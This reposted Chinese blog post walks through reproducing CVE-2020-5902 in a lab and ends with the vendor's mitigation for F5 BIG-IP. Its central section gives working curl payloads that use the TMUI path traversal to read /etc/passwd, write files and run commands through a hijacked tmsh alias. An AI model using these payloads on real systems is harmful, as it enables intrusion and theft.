[转帖]CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现

cve,f5,big,ip,远程,代码执行,漏洞,复现 · 浏览次数 : 0

小编点评

**漏洞复现 Timeline Sec 漏洞概述** **漏洞名称:** CVE-2020-5902 **漏洞类型:** 远程代码执行漏洞 **漏洞描述:** 攻击者可以通过向漏洞页面发送特制请求包,实现任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: * 执行任意系统命令 * 开启/禁用服务 * 创建/删除服务器端文件等 **漏洞影响范围:** 控制面板受影响,不影响数据面板 **漏洞修复方法:** 1. 使用以下命令登录对应系统tmsh2 2. 编辑 httpd 组件的配置文件edit /sys httpd all-properties3 3. 文件内容如下: ``` Include ' <LocationMatch \".*\\.\\.;.*\"> Redirect 404 / </LocationMatch> ' 4. 按照如下操作保存文件按下 ESC 并依次输入 :wq5) 执行命令刷新配置文件save /sys config6 5. 重启 httpd 服务restart sys service httpd并禁止外部IP对 TMUI 页面的访问相关利用脚本: ``` https://github.com/aqhmal/CVE-2020-5902-Scannerhttps://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse ```

正文

 

 2020-09-29  9,863
 
关注我们,一起学安全!本文作者:TeddyGrey@Timeline Sec
本文字数:1197阅读时长:3~4min声明:请勿用作违法用途,否则后果自负

0x01 简介

F5 BIGIP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。


0x02 漏洞概述

漏洞编号:CVE-2020-5902。未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。该漏洞影响控制面板受影响,不影响数据面板。
0x03 影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

 

 

 

 

 

0x04 环境搭建

 

1、在官网下载vmware文件

https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition

2、直接访问会跳转,需要注册个账号~

3、导入Vmware:文件-->打开-->一路下一步导入虚拟机导入后直接启动即可系统默认账户:root/default登陆后需要修改默认密码,之后ifconfig查看IP

浏览器访问https://192.168.150.147,跳转如下图就说明好啦!

 

0x05 漏洞复现

 

执行tmsh命令

payload

 

curl -k "  curl -k "https://192.168.150.146/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"

写入

 

curl -k -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "fileName=/tmp/success&content=CVE-2020-5902" "https://192.168.150.146/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"

读取

 

curl -k "https://192.168.150.146/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"

1. 修改alias劫持list命令为bash

 

curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"

2. 写入bash文件

 

curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id"

3. 执行bash文件

 

curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test"

4. 还原list命令

 

curl -k "https://example.com/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list"

image.png

payload:

劫持list命令实现任意命令执行

image.png

payload:

任意文件上传

image.png

payload:

任意文件读取

image.png

 

0x06 修复方式

 

官方建议可以通过以下步骤临时缓解影响

1) 使用以下命令登录对应系统
tmsh
2) 编辑 httpd 组件的配置文件
edit /sys httpd all-properties
3) 文件内容如下
include ' <LocationMatch ".*\.\.;.*"> Redirect 404 / </LocationMatch> '
4) 按照如下操作保存文件
按下 ESC 并依次输入 :wq
5) 执行命令刷新配置文件
save /sys config
6) 重启 httpd 服务
restart sys service httpd
并禁止外部IP对 TMUI 页面的访问

相关利用脚本:

 

https://github.com/aqhmal/CVE-2020-5902-Scannerhttps://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse

image.png

参考链接:

  https://cert.360.cn/warning/detail?id=a1768348bde7807647cbc7232edce7df

https://github.com/jas502n/CVE-2020-5902
https://blog.csdn.net/ice_age1/article/details/49998059

本文作者:Timeline Sec

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/142397.html

与[转帖]CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现相似的内容:

[转帖]CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现

漏洞复现 Timeline Sec 2020-09-29 9,863 关注我们,一起学安全!本文作者:TeddyGrey@Timeline Sec本文字数:1197阅读时长:3~4min声明:请勿用作违法用途,否则后果自负0x01 简介 F5 BIGIP 链路控制器用于最大限度提升链路性能与可用性的

[转帖]PostgreSQL任意命令执行漏洞利用(CVE-2019-9193)

https://zhuanlan.zhihu.com/p/143443516 最近没事曰曰内网,偶然发现了一个使用空密码的pg(是的,连爆破都省了)。用navicat连上去看了下几个库都是一些业务测试数据,没什么好收集;不死心,google了一下发现有个比较新的CVE好像可以操作一下~ 漏洞概述 最

[转帖]

Linux ubuntu20.04 网络配置(图文教程) 因为我是刚装好的最小系统,所以很多东西都没有,在开始配置之前需要做下准备 环境准备 系统:ubuntu20.04网卡:双网卡 网卡一:供连接互联网使用网卡二:供连接内网使用(看情况,如果一张网卡足够,没必要做第二张网卡) 工具: net-to

[转帖]

https://cloud.tencent.com/developer/article/2168105?areaSource=104001.13&traceId=zcVNsKTUApF9rNJSkcCbB 前言 Redis作为高性能的内存数据库,在大数据量的情况下也会遇到性能瓶颈,日常开发中只有时刻

[转帖]ISV 、OSV、 SIG 概念

ISV 、OSV、 SIG 概念 2022-10-14 12:29530原创大杂烩 本文链接:https://www.cndba.cn/dave/article/108699 1. ISV: Independent Software Vendors “独立软件开发商”,特指专门从事软件的开发、生产、

[转帖]Redis 7 参数 修改 说明

2022-06-16 14:491800原创Redis 本文链接:https://www.cndba.cn/dave/article/108066 在之前的博客我们介绍了Redis 7 的安装和配置,如下: Linux 7.8 平台 Redis 7 安装并配置开机自启动 操作手册https://ww

[转帖]HTTPS中间人攻击原理

https://www.zhihu.com/people/bei-ji-85/posts 背景 前一段时间,公司北京地区上线了一个HTTPS防火墙,用来监听HTTPS流量。防火墙上线之前,邮件通知给管理层,我从我老大那里听说这个事情的时候,说这个有风险,然后意外地发现,很多人原来都不知道HTTPS防

[转帖]关于字节序(大小端)的一点想法

https://www.zhihu.com/people/bei-ji-85/posts 今天在一个技术群里有人问起来了,当时有一些讨论(不完全都是我个人的观点),整理一下: 为什么网络字节序(多数情况下)是大端? 早年设备的缓存很小,先接收高字节能快速的判断报文信息:包长度(需要准备多大缓存)、地

[转帖]awk提取某一行某一列的数据

https://www.jianshu.com/p/dbcb7fe2da56 1、提取文件中第1列数据 awk '{print $1}' filename > out.txt 2、提取前2列的文件 awk `{print $1,$2}' filename > out.txt 3、打印完第一列,然后打

[转帖]awk 中 FS的用法

https://www.cnblogs.com/rohens-hbg/p/5510890.html 在openwrt文件 ar71xx.sh中 查询设备类型时,有这么一句, machine=$(awk 'BEGIN{FS="[ \t]+:[ \t]"} /machine/ {print $2}' /